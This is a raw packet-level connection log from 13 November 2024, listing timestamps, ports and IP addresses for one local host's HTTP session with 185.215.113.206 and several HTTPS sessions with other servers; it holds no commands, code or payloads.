Nov 13, 2024 20:39:26.271450996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271486044 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271492958 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271528959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271548033 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271579981 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271632910 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271689892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271744967 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271856070 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271891117 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271908045 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.271941900 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.271996021 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272093058 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272129059 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272147894 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272164106 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272171974 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272202015 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272214890 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272237062 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272252083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272272110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272281885 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272306919 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272336006 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.272357941 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272365093 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272381067 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272397041 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272411108 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272425890 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272433996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272433996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272440910 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272454977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272460938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272469044 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272483110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272485971 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272497892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272504091 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272504091 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272528887 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272541046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272547960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272630930 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.272681952 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.272686958 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272753954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.272805929 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.272814035 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.272859097 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.272926092 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.273340940 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.273367882 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.273389101 CET	49738	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.273396015 CET	443	49738	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.274055004 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.274055004 CET	49737	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.274089098 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.274115086 CET	443	49737	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.276217937 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.276309967 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.276401997 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.276737928 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.276771069 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.277728081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277787924 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277812004 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.277829885 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277859926 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.277880907 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.277884960 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277920008 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277936935 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.277956963 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.277977943 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.277997017 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278021097 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278054953 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278067112 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278069973 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.278139114 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.278151989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278187990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278206110 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278208017 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.278223038 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278238058 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278285980 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278311968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278353930 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278376102 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278410912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278464079 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278515100 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278702021 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.278716087 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278717041 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.278734922 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.278738976 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.278753042 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278783083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278808117 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.278835058 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278852940 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278889894 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278925896 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278939962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.278961897 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.278984070 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.279002905 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.279019117 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279019117 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279097080 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279148102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279184103 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279203892 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279203892 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279218912 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279263020 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279269934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279297113 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279308081 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279417992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279473066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279473066 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279484987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279769897 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279803038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279836893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279872894 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279895067 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279896021 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279906988 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279922962 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279942036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279962063 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.279977083 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.279997110 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280011892 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280025959 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280046940 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280080080 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280081987 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.280088902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280088902 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280113935 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280128002 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.280148983 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280165911 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280184031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280205011 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.280220032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:26.280227900 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280354977 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.280368090 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:26.280385017 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.404067039 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.406163931 CET	49739	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.406234980 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.406660080 CET	49739	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.406675100 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.539366961 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.539530993 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.539657116 CET	49739	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.539834023 CET	49739	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.539881945 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.539917946 CET	49739	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.539933920 CET	443	49739	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.542531013 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.542568922 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.542659044 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.542823076 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:26.542838097 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:26.612376928 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.612555981 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.614583969 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.614618063 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.614959002 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.617197990 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.617258072 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.617284060 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.617341995 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.659354925 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.864352942 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.881427050 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.881427050 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.881452084 CET	443	49740	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:26.881771088 CET	49740	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:26.995503902 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.020025969 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.027167082 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.028764963 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.036789894 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.068103075 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.070851088 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.077263117 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.081722021 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.081779003 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.082150936 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.082207918 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.082257032 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.082278967 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.082586050 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.082600117 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.082843065 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.082861900 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.083122969 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.083127975 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.084588051 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.084597111 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.084991932 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.084996939 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.205665112 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.205835104 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.205918074 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.208316088 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.208393097 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.208461046 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.210199118 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.210278034 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.210340977 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.213205099 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.213346958 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.213391066 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.277745008 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.319483995 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.370578051 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.370598078 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.370970011 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.370980024 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.371155024 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.371207952 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.371234894 CET	49743	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.371234894 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.371234894 CET	49741	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.371249914 CET	443	49743	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.371259928 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.371269941 CET	443	49741	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.372529030 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.372546911 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.372582912 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.372603893 CET	49742	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.372606039 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.372612953 CET	443	49742	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.372642040 CET	49744	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.372662067 CET	443	49744	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.430994034 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.431034088 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.431103945 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.439987898 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.440011024 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.487418890 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.487464905 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.487524033 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.487848043 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.487905979 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.487953901 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.492701054 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.492748022 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.492805004 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.498059988 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.498286963 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.498333931 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.528906107 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.528932095 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.532964945 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.533001900 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.533596039 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.533632994 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.533770084 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.533788919 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.533802986 CET	49745	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.533809900 CET	443	49745	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.550601006 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.550642967 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:27.550719976 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.551084042 CET	49750	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:27.551100016 CET	443	49750	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.204706907 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:28.204777956 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:28.212903023 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.255228043 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.255291939 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.255929947 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.255944014 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.277435064 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.277491093 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.277549028 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.277760983 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.277817011 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.277951956 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.277971029 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.277993917 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.278034925 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278129101 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278150082 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.278280973 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278347969 CET	49754	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278378963 CET	443	49754	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.278595924 CET	49755	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278613091 CET	443	49755	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.278758049 CET	49756	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278775930 CET	443	49756	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.278918028 CET	49757	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:28.278943062 CET	443	49757	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:28.282753944 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.283890963 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.286268950 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.286281109 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.286742926 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.286748886 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.296972036 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.296991110 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.297318935 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.297396898 CET	49749	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.297408104 CET	443	49749	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.297667980 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.297691107 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.298036098 CET	49748	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.298042059 CET	443	49748	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.387144089 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.387300968 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.387370110 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.387670994 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.387695074 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.387711048 CET	49746	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.387720108 CET	443	49746	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.392813921 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.392852068 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.392946959 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.393572092 CET	49758	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.393587112 CET	443	49758	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.412620068 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.412776947 CET	443	49747	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:28.412830114 CET	49747	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:28.413294077 CET	49747	443	192.168.2.5	13.107.246.45
